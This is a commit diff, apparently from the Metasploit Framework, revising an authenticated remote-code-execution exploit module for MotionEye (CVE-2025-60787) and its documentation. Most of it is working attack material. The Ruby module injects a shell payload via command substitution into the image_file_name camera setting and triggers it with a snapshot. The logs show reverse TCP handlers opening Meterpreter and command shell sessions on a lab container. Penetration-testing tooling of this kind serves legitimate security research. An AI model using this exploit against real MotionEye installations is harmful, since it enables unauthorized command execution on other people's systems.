code review changes from @bwatters-r7

vognik · vognik · commit c05a9d3f7f7c · 2025-10-07T03:07:26.000+04:00
diff --git a/documentation/modules/exploit/multi/http/motioneye_auth_rce_cve_2025_60787.md b/documentation/modules/exploit/multi/http/motioneye_auth_rce_cve_2025_60787.md
@@ -5,21 +5,22 @@ This module exploits a template injection vulnerability in the [MotionEye Fronte
 MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as `image_file_name`.
 Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.
 
-Exploit workflow:
-1. Adds a new camera in MotionEye Frontend.
-2. Injects the payload into the image_file_name field (used for naming camera screenshots).
-3. Captures a screenshot, triggering the payload.
-
-Successful exploitation may result in the remote code execution as the user running
-of the web server, potentially exposing sensitive data or disrupting survey operations.
+Successful exploitation will result in the command executing as the user running
+the web server, potentially exposing sensitive data or disrupting survey operations.
 
 An attacker can execute arbitrary system commands in the context of the user running the web server.
 
+## Exploit Workflow
+
+1. Adds a new camera in MotionEye Frontend.
+2. Injects the payload into the image_file_name field (used for naming camera screenshots).
+3. Captures a screenshot ("snapshot" in the terminology of MotionEye), triggering the payload.
+
 ## Testing
 
 1. Use Docker to set up the MotionEye app
 
-`docker run -p 9999:8765 ghcr.io/motioneye-project/motioneye@sha256:718171663d28f04f2fb97244f8ef03a814367b06078fc00685acc47f61663890`
+`docker run -p 9999:8765 ghcr.io/motioneye-project/motioneye@sha256:2dcc3c4da1830ef824067375b2e022fa28c5fdbca773f5496bd35543ec45bef7`
 
 2. Open http://127.0.0.1:9999/ and make sure the app is available
 
@@ -43,15 +44,15 @@ msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > run
 [*] Started reverse TCP handler on 192.168.19.130:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Detected version 0.43.14, which is vulnerable
-[*] Adding camera...
+[*] Adding malicious camera...
 [+] Camera successfully added
 [*] Setting up exploit...
-[+] Exploit installation completed
-[*] Executing exploit...
-[+] Execution exploit request sent successfully
-[*] Removing camera
+[+] Exploit setup complete
+[*] Triggering exploit...
+[+] Exploit triggered, waiting for session...
 [*] Sending stage (3045380 bytes) to 172.17.0.2
 [*] Meterpreter session 1 opened (192.168.19.130:4444 -> 172.17.0.2:38124) at 2025-10-04 21:08:57 -0400
+[*] Removing camera
 [+] Camera removed successfully
 
 meterpreter > sysinfo
@@ -78,15 +79,15 @@ msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > run
 [*] Started reverse TCP handler on 192.168.19.130:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Detected version 0.43.14, which is vulnerable
-[*] Adding camera...
+[*] Adding malicious camera...
 [+] Camera successfully added
 [*] Setting up exploit...
-[+] Exploit installation completed
-[*] Executing exploit...
-[+] Execution exploit request sent successfully
+[+] Exploit setup complete
+[*] Triggering exploit...
+[+] Exploit triggered, waiting for session...
+[*] Command shell session 1 opened (192.168.19.130:4444 -> 172.17.0.2:60160) at 2025-10-06 04:46:34 -0400
 [*] Removing camera
 [+] Camera removed successfully
-[*] Command shell session 1 opened (192.168.19.130:4444 -> 172.17.0.2:60160) at 2025-10-06 04:46:34 -0400
 
 cat /etc/os-release
 PRETTY_NAME="Debian GNU/Linux 13 (trixie)"
@@ -200,5 +201,5 @@ if __name__ == '__main__':
 
 Example of usage:
 ```
-python3 ./hash.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body '' --key ""
+python3 ./main.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
 ```
diff --git a/modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb b/modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb
@@ -20,8 +20,8 @@ def initialize(info = {})
           MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as image_file_name.
           Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.
 
-          Successful exploitation may result in the remote code execution as the user running
-          of the web server, potentially exposing sensitive data or disrupting survey operations.
+          Successful exploitation will result in the command executing as the user running
+          the web server, potentially exposing sensitive data or disrupting survey operations.
 
           An attacker can execute arbitrary system commands in the context of the user running the web server.
         },
@@ -188,20 +188,21 @@ def add_camera
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => {
-        'scheme' => 'rtsp',
-        'host' => '127.0.0.1',
+        'scheme' => '',
+        'host' => '',
         'port' => '',
         'path' => '/',
         'username' => '',
-        'password' => '',
-        'proto' => 'netcam',
-        'camera_index' => 'tcp'
+        'proto' => 'netcam'
       }.to_json
     )
 
-    begin
-      json_body = JSON.parse(res.body)
-    rescue JSON::ParserError
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    json_body = res.get_json_document
+    unless json_body
       fail_with(Failure::UnexpectedReply, 'Unable to parse the response')
     end
 
@@ -217,14 +218,15 @@ def add_camera
   def set_exploit(camera_id)
     print_status('Setting up exploit...')
 
+    camera_name = Rex::Text.rand_text_alphanumeric(4..16)
     res = send_signed_request_cgi(
       'uri' => normalize_uri(target_uri.path, '/config/0/set/'),
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => {
         camera_id => {
           'enabled' => true,
-          'name' => 'Camera1',
+          'name' => camera_name,
           'proto' => 'netcam',
           'auto_brightness' => false,
           'rotation' => '0',
@@ -236,7 +238,7 @@ def set_exploit(camera_id)
           'network_smb_ver' => '1.0',
           'network_username' => '',
           'network_password' => '',
-          'root_directory' => '/var/lib/motioneye/Camera1',
+          'root_directory' => "/var/lib/motioneye/#{camera_name}",
           'upload_enabled' => false,
           'upload_picture' => false,
           'upload_movie' => false,
@@ -248,7 +250,6 @@ def set_exploit(camera_id)
           'upload_subfolders' => false,
           'upload_username' => '',
           'upload_password' => '',
-          'upload_authorization_key' => '',
           'upload_endpoint_url' => '',
           'upload_access_key' => '',
           'upload_secret_key' => '',
@@ -258,7 +259,7 @@ def set_exploit(camera_id)
           'command_storage_enabled' => false,
           'text_overlay' => false,
           'text_scale' => '1',
-          'video_streaming' => true,
+          'video_streaming' => false,
           'streaming_framerate' => '5',
           'streaming_quality' => '85',
           'streaming_resolution' => '100',
@@ -270,7 +271,6 @@ def set_exploit(camera_id)
           'image_file_name' => "$(#{payload.encoded})",
           'image_quality' => '85',
           'capture_mode' => 'manual',
-          'snapshot_interval' => '0',
           'preserve_pictures' => '0',
           'manual_snapshots' => true,
           'movies' => false,
@@ -285,7 +285,7 @@ def set_exploit(camera_id)
           'frame_change_threshold' => '0.6507161458333334',
           'max_frame_change_threshold' => '0',
           'auto_threshold_tuning' => false,
-          'auto_noise_detect' => true,
+          'auto_noise_detect' => false,
           'noise_level' => '13',
           'light_switch_detect' => '0',
           'despeckle_filter' => false,
@@ -370,10 +370,14 @@ def check
     return CheckCode::Detected("At the time of writing the module, no patch for this vulnerability exists. A newer version #{motion_version} has been found compared to the vulnerable releases; however, it is unclear whether the issue has been fixed. It is recommended to review the release notes")
   end
 
+  def cleanup
+    del_camera(@camera_id) unless @camera_id.nil?
+    super
+  end
+
   def exploit
-    camera_id = add_camera
-    set_exploit(camera_id)
-    trigger_exploit(camera_id)
-    del_camera(camera_id)
+    @camera_id = add_camera
+    set_exploit(@camera_id)
+    trigger_exploit(@camera_id)
   end
 end
